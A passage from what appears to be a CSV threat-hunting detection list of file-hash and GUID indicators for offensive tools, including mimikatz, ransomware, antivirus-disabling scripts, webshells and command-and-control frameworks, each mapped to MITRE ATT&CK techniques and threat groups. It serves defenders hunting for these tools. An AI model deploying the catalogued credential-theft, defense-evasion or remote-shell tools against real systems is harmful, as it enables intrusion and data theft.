T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","0","#filehash","N/A","10","2","167","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z","22534" "*19804c0341ec2408b025626ac9259438f9c403104f155eedfa9b2395d85490b3*",".{0,1000}19804c0341ec2408b025626ac9259438f9c403104f155eedfa9b2395d85490b3.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variants in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","22535" "*19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618*",".{0,1000}19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","#filehash","nsudo.exe","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","22536" "*198a1a3d69ff345e90ee64c3b437c7face55537cbe18b40506d54f5c489bca68*",".{0,1000}198a1a3d69ff345e90ee64c3b437c7face55537cbe18b40506d54f5c489bca68.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","22537" 
"*198a5ea52dda1eeca520c018ef7b21a217ea3a5ab7a3f07327e5ba0f172fd33b*",".{0,1000}198a5ea52dda1eeca520c018ef7b21a217ea3a5ab7a3f07327e5ba0f172fd33b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22538" "*198dc4828f294ed26c63eaf2c0d38e2d7a21db41fe31ce988d9139ea2245f0ea*",".{0,1000}198dc4828f294ed26c63eaf2c0d38e2d7a21db41fe31ce988d9139ea2245f0ea.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","22539" "*1990a0005ec6cd1b0cbfaa53cb51f27622f17e14df230215cb9921e1b2552a47*",".{0,1000}1990a0005ec6cd1b0cbfaa53cb51f27622f17e14df230215cb9921e1b2552a47.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22540" "*199c57a85711459c0b0fbc8883b19829cec8c64588f50bb4a6b2611f6ad4d62b*",".{0,1000}199c57a85711459c0b0fbc8883b19829cec8c64588f50bb4a6b2611f6ad4d62b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22541" "*19a3e58ea39c3de292defd823d99bc5e5a01b6d12e755401178854aaf1c644d5*",".{0,1000}19a3e58ea39c3de292defd823d99bc5e5a01b6d12e755401178854aaf1c644d5.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","22542" "*19a43d7ebc516f2344e6ffac66205d54cbde907e2eb1fb6171934d292524c5c7*",".{0,1000}19a43d7ebc516f2344e6ffac66205d54cbde907e2eb1fb6171934d292524c5c7.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1217 - T1070 - T1113","TA0009 - TA0005 - TA0007","N/A","GOBLIN PANDA","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22543" 
"*19aa5edc4fd83677bf6af63d5950707a6425a1550ef47ba8b00d629d95382750*",".{0,1000}19aa5edc4fd83677bf6af63d5950707a6425a1550ef47ba8b00d629d95382750.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22544" "*19b43b756288d54603b5f435dd5f8a19cba1e3d90db3502246f1d314a917e4b4*",".{0,1000}19b43b756288d54603b5f435dd5f8a19cba1e3d90db3502246f1d314a917e4b4.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","22545" "*19bab15a34d5ad838ccf4d187eb40379c335fa56446d0f9621865b2767d4ac7d*",".{0,1000}19bab15a34d5ad838ccf4d187eb40379c335fa56446d0f9621865b2767d4ac7d.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1083 - T1552","TA0006 ","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A","22547" 
"*19c09fad30c786cc22fb38d3f97021c0b35aaa9cd288d44970a45b5d1cb86070*",".{0,1000}19c09fad30c786cc22fb38d3f97021c0b35aaa9cd288d44970a45b5d1cb86070.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","22548" "*19c66cdf6c01ddd42f8cfef1e843ee5f8d929b05135190e9ce0c988180e7439a*",".{0,1000}19c66cdf6c01ddd42f8cfef1e843ee5f8d929b05135190e9ce0c988180e7439a.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","22550" "*19c95ad5cf50f8c8273fcd4179c4878ebede832f9234955ac4fd4233b5b6a693*",".{0,1000}19c95ad5cf50f8c8273fcd4179c4878ebede832f9234955ac4fd4233b5b6a693.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22551" "*19cce61cee800661797745070ba28b0c3b7ca2b3709d883b654a9a6e01535503*",".{0,1000}19cce61cee800661797745070ba28b0c3b7ca2b3709d883b654a9a6e01535503.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - 
T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","22554" "*19d22a57efb66f96f7c8aa0650cc42a93bda9074d263f37ad120f51061e6bbf1*",".{0,1000}19d22a57efb66f96f7c8aa0650cc42a93bda9074d263f37ad120f51061e6bbf1.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22556" "*19d2b32e9801a4f959ce59e251879d9a42ac749e2e702a8ceab2ddee2d71bbb1*",".{0,1000}19d2b32e9801a4f959ce59e251879d9a42ac749e2e702a8ceab2ddee2d71bbb1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22557" "*19dc8d8108bab9207905b08b57193efc9fd4e13f2cb901c7ca1ffd727cd62e4a*",".{0,1000}19dc8d8108bab9207905b08b57193efc9fd4e13f2cb901c7ca1ffd727cd62e4a.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","22559" "*19e2bd43425bcc1602df3db4fbd0775a29d70d24ae5ff139a1fefcfecdd79e40*",".{0,1000}19e2bd43425bcc1602df3db4fbd0775a29d70d24ae5ff139a1fefcfecdd79e40.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22560" "*19e7a5fd08ffa93823b623f349a5922b026253d535381ced0ab0e107d1a67069*",".{0,1000}19e7a5fd08ffa93823b623f349a5922b026253d535381ced0ab0e107d1a67069.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","22563" "*19f0c96e4b201d75902e2eb10fdeb4aba4fe00f7f5bc897097c1f3f8262fca47*",".{0,1000}19f0c96e4b201d75902e2eb10fdeb4aba4fe00f7f5bc897097c1f3f8262fca47.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22567" "*19f46bd0cecc1c03859e2a19b2041f6538f4e43aa3124b3eaaec00767381935f*",".{0,1000}19f46bd0cecc1c03859e2a19b2041f6538f4e43aa3124b3eaaec00767381935f.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","22568" "*19f900f1332f1cb5895c079d90c982f7eae6cb67f989116a3cbba5101fbbe9b1*",".{0,1000}19f900f1332f1cb5895c079d90c982f7eae6cb67f989116a3cbba5101fbbe9b1.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","22569" "*1a0cd260249bb72d4c8cee640bc880c4ddb20609f0927114cb8f655bd9311aac*",".{0,1000}1a0cd260249bb72d4c8cee640bc880c4ddb20609f0927114cb8f655bd9311aac.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#filehash","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","22572" "*1a187b6f85a5db0e62f10fcc40e5a212bb19cf6b3713b1def3ad90670315093c*",".{0,1000}1a187b6f85a5db0e62f10fcc40e5a212bb19cf6b3713b1def3ad90670315093c.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22573" "*1a1be3746ab4055e51557ec20f236da58a4dcbe1a523c8f5a2cd5dc97e699533*",".{0,1000}1a1be3746ab4055e51557ec20f236da58a4dcbe1a523c8f5a2cd5dc97e699533.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","22577" "*1a1c3d4c9b4d634ef0f741a0fe610935f6c5c0cf2c0cfc2a4a6d8b3702731b1b*",".{0,1000}1a1c3d4c9b4d634ef0f741a0fe610935f6c5c0cf2c0cfc2a4a6d8b3702731b1b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22578" "*1a26c5a16b9601d79e53c830cfb5e339b6629d3e1d1d4ceb2993c7ff48734c60*",".{0,1000}1a26c5a16b9601d79e53c830cfb5e339b6629d3e1d1d4ceb2993c7ff48734c60.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","22580" 
"*1a279f5df4103743b823ec2a6a08436fdf63fe30*",".{0,1000}1a279f5df4103743b823ec2a6a08436fdf63fe30.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","22581" "*1a3c4069-8c11-4336-bef8-9a43c0ba60e2*",".{0,1000}1a3c4069\-8c11\-4336\-bef8\-9a43c0ba60e2.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","#GUIDproject","module id","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","22585" "*1a3d0a8e65633283bb4e116282eaa271027dae9fb3b3658918198bbec4dd6b94*",".{0,1000}1a3d0a8e65633283bb4e116282eaa271027dae9fb3b3658918198bbec4dd6b94.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22586" "*1a4a751f7044db4952d7e6607f24ade9ebbddbf2c6665de8cae3e7027df28dd2*",".{0,1000}1a4a751f7044db4952d7e6607f24ade9ebbddbf2c6665de8cae3e7027df28dd2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22589" "*1a500fbb73dca02d86318499781d5932bf8e66471e98a9d543904e661fa87c19*",".{0,1000}1a500fbb73dca02d86318499781d5932bf8e66471e98a9d543904e661fa87c19.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","22590" "*1a51e5f891a81351f0e0bdc2bca6c2d4aaa0bc07e0a313b2cec8e77a63d236a1*",".{0,1000}1a51e5f891a81351f0e0bdc2bca6c2d4aaa0bc07e0a313b2cec8e77a63d236a1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22592" "*1a524806875110320dacb05bb8a00bbe07f8618ff23a82effad887df9952f459*",".{0,1000}1a524806875110320dacb05bb8a00bbe07f8618ff23a82effad887df9952f459.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth 
Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","22593" "*1a550baec33973542f4a634762c680be12e21c3c91eb62e68558bfb5c96bbf5e*",".{0,1000}1a550baec33973542f4a634762c680be12e21c3c91eb62e68558bfb5c96bbf5e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22596" "*1a55475f6cdba11f604d7006993a060ca4301fa8830d51f8c30cc244ec50b471*",".{0,1000}1a55475f6cdba11f604d7006993a060ca4301fa8830d51f8c30cc244ec50b471.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22597" "*1a571ac5b806ffce2605b57753f74653ddb392e5afdb0e49c3e9e8d76e561568*",".{0,1000}1a571ac5b806ffce2605b57753f74653ddb392e5afdb0e49c3e9e8d76e561568.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#filehash","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","22599" "*1a57eb11c69b6af09823fc2ffe4fdaa6b70142378706af50609ba9ef92c33627*",".{0,1000}1a57eb11c69b6af09823fc2ffe4fdaa6b70142378706af50609ba9ef92c33627.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in 
the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","22600" "*1a661c04442e03afed5683e5d92798b9be628e197ba047ac45b7d831444fc3fe*",".{0,1000}1a661c04442e03afed5683e5d92798b9be628e197ba047ac45b7d831444fc3fe.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22602" "*1a6f0316931108a810daf959016373747a6017c62c2b1efb7ee049bad6961b19*",".{0,1000}1a6f0316931108a810daf959016373747a6017c62c2b1efb7ee049bad6961b19.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22604" "*1a7ef3d45e179cdfc60a891b790f4310c273f0198d330f514ae213a7c4865f67*",".{0,1000}1a7ef3d45e179cdfc60a891b790f4310c273f0198d330f514ae213a7c4865f67.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","22606" "*1a8443e9b45e5a141d9009fb1f3fb762642b72917649b8bd98b1558edb2fcdcf*",".{0,1000}1a8443e9b45e5a141d9009fb1f3fb762642b72917649b8bd98b1558edb2fcdcf.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22607" "*1a8630762516e988f1ffb834e1e345c44d8b38d59dfba65ebd36d70d67241014*",".{0,1000}1a8630762516e988f1ffb834e1e345c44d8b38d59dfba65ebd36d70d67241014.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 